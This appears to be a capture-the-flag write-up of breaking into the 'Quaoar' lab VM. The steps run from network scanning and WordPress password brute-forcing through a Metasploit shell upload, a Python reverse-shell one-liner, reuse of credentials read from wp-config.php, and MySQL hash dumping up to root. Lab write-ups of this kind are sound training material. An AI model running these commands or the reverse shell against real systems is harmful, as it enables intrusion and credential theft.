[*]
1. Find host: nmap -sn 192.168.56.0/24
Starting Nmap 7.60 ( https://nmap.org ) at 2020-09-05 13:41 UTC
Nmap scan report for ubuntu-bionic-1 (192.168.56.1)
Host is up (0.00059s latency).
Nmap scan report for 192.168.56.101
Host is up (0.0038s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.75 seconds

[*]
2. Quick scan: nmap 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2020-09-05 13:43 UTC
Nmap scan report for 192.168.56.101
Host is up (0.015s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

[*]
3. Service scan: nmap -A -p 22,53,80,110,139,143,445,993,995 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2020-09-05 13:45 UTC
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 13:45 (0:00:12 remaining)
Nmap scan report for 192.168.56.101
Host is up (0.0016s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: UIDL SASL TOP STLS PIPELINING CAPA RESP-CODES
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2020-09-05T13:45:53+00:00; -1s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: STARTTLS more LOGINDISABLEDA0001 LOGIN-REFERRALS SASL-IR capabilities IDLE post-login ENABLE listed OK Pre-login IMAP4rev1 have ID LITERAL+
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2020-09-05T13:45:50+00:00; -2s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2020-09-05T13:45:54+00:00; -1s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
 ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2020-09-05T13:45:53+00:00; -2s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-09-05T09:45:49-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

[*]
4. First look
Old SSH version would allow for user enumeration, apache version is old and might allow shellshock to .cgi files, SMB version is old. Enumerating some more

[*]
5. SSH enumeration: ssh 192.168.56.101
no banner

[*]
6. DNS enumeration: Quick bash script
hosts=(192.168.56.101 localhost 127.0.0.1)
for i in ${hosts[@]}; do
  host 192.168.56.101 $hosts
done

All queries failed :(

[*]
7. HTTP enumeration: nikto -h 192.168.56.101
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2020-09-05 13:59:55 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: 0x53f946d9971d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Uncommon header 'x-pingback' found, with contents: /wordpress/xmlrpc.php
+ File/dir '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 

+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 6544 items checked: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-09-05 14:02:00 (GMT0) (125 seconds)

[*]
8. HTTP directory enumeration: dirb http://192.168.56.101/ -a linux -t 40 | grep "CODE:200"

+ http://192.168.56.101/hacking (CODE:200|SIZE:616848)
+ http://192.168.56.101/index (CODE:200|SIZE:100)
+ http://192.168.56.101/index.html (CODE:200|SIZE:100)
+ http://192.168.56.101/LICENSE (CODE:200|SIZE:1672)
+ http://192.168.56.101/robots (CODE:200|SIZE:271)
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:271)
+ http://192.168.56.101/upload/config (CODE:200|SIZE:0)
+ http://192.168.56.101/upload/index (CODE:200|SIZE:3040)
+ http://192.168.56.101/upload/index.php (CODE:200|SIZE:3040)
+ http://192.168.56.101/wordpress/license (CODE:200|SIZE:19930)
+ http://192.168.56.101/wordpress/readme (CODE:200|SIZE:7195)
+ http://192.168.56.101/wordpress/wp-blog-header (CODE:200|SIZE:0)
+ http://192.168.56.101/wordpress/wp-config (CODE:200|SIZE:0)
+ http://192.168.56.101/wordpress/wp-cron (CODE:200|SIZE:0)
+ http://192.168.56.101/wordpress/wp-links-opml (CODE:200|SIZE:217)
+ http://192.168.56.101/wordpress/wp-load (CODE:200|SIZE:0)
+ http://192.168.56.101/wordpress/wp-login (CODE:200|SIZE:2530)
+ http://192.168.56.101/wordpress/wp-trackback (CODE:200|SIZE:135)
+ http://192.168.56.101/wordpress/xmlrpc (CODE:200|SIZE:42)
+ http://192.168.56.101/wordpress/xmlrpc.php (CODE:200|SIZE:42)
[*]
9. Robots.txt entry (cute)
Disallow: Hackers
Allow: /wordpress/
   ____                              
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|   

[*]
10. Quick bruteforce
[+] URL: http://192.168.56.101/wordpress/ [192.168.56.101]
[+] Started: Sat Sep  5 14:52:13 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.101/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://192.168.56.101/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.101/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.101/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.101/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
 |  - http://192.168.56.101/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.56.101/wordpress/wp-content/themes/twentyfourteen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://192.168.56.101/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
 | Style Name: Twenty Fourteen
 | Style URI: http://wordpress.org/themes/twentyfourteen
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: http://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.101/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:03 <==========================================================================================================================> (10 / 10) 100.00% Time: 00:00:03

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wpuser
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
Progress Time: 00:00:00 <================================================================================================================================================> (0 / 0) 100.0% Time: 00:00:00
WARNING: Your progress bar is currently at 0 out of 0 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Progress Time: 00:00:00 <================================================================================================================================================> (0 / 0) 100.0% Time: 00:00:00
[SUCCESS] - admin / admin                                                                                                                                                                               
All Found                                                                                                                                                                                               

[!] Valid Combinations Found:
 | Username: admin, Password: admin

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sat Sep  5 14:52:23 2020
[+] Requests Done: 17
[+] Cached Requests: 49
[+] Data Sent: 11.194 KB
[+] Data Received: 22.803 KB
[+] Memory used: 79.898 MB
[+] Elapsed time: 00:00:09


[*]
11. Get shell 
msfconsle
use unix/webapp/wp_admin_shell_upload
set LHOST 192.168.56.1
set LPORT 443
set TARGETURI /wordpress
set USERNAME admin
set PASSWORD admin
set PAYLOAD php/reverse_php
set RHOSTS 192.168.56.101
expliot

[*]
12. Move shell to persist
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[*]
13. Upgrade shell to interactive
python -c "import pty;pty.spawn(['/bin/bash', '-i'])"
reset
xterm

[*]
14. Priv esc: wp-config.php
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

[*]
15. mysql enumeration: 
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Lepton             |
| mysql              |
| performance_schema |
| test               |
| wordpress          |
+--------------------+
show tables;
+----------------------------+
| Tables_in_wordpress        |
+----------------------------+
| wp_commentmeta             |
| wp_comments                |
| wp_links                   |
| wp_masta_campaign          |
| wp_masta_cronapi           |
| wp_masta_list              |
| wp_masta_reports           |
| wp_masta_responder         |
| wp_masta_responder_reports |
| wp_masta_settings          |
| wp_masta_subscribers       |
| wp_masta_support           |
| wp_options                 |
| wp_postmeta                |
| wp_posts                   |
| wp_term_relationships      |
| wp_term_taxonomy           |
| wp_terms                   |
| wp_usermeta                |
| wp_users                   |
+----------------------------+
select * from wp_users;
admin $P$BAgwF1u99OZU1iqTgTIrUmBbtIjRMu1
wpuser $P$BdcZZVb0ssMccLU1ECFCtUihocqQ0S.
select * from lep_users;
admin 5f4dcc3b5aa765d61d8327deb882cf99

[*]
16. Escalate users:
cat /home/wpadmin/flag.txt
2bafe61f03117ac66a73c3c514de796e
used md5online to decrypt md5sum
Found : QuaoarWordpress

[*]
17. Login as user
This was NOT the pass. I was however to login as root with the same creds as mysql

su - root
rootpassword!

[*]
18. Claim flag
cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

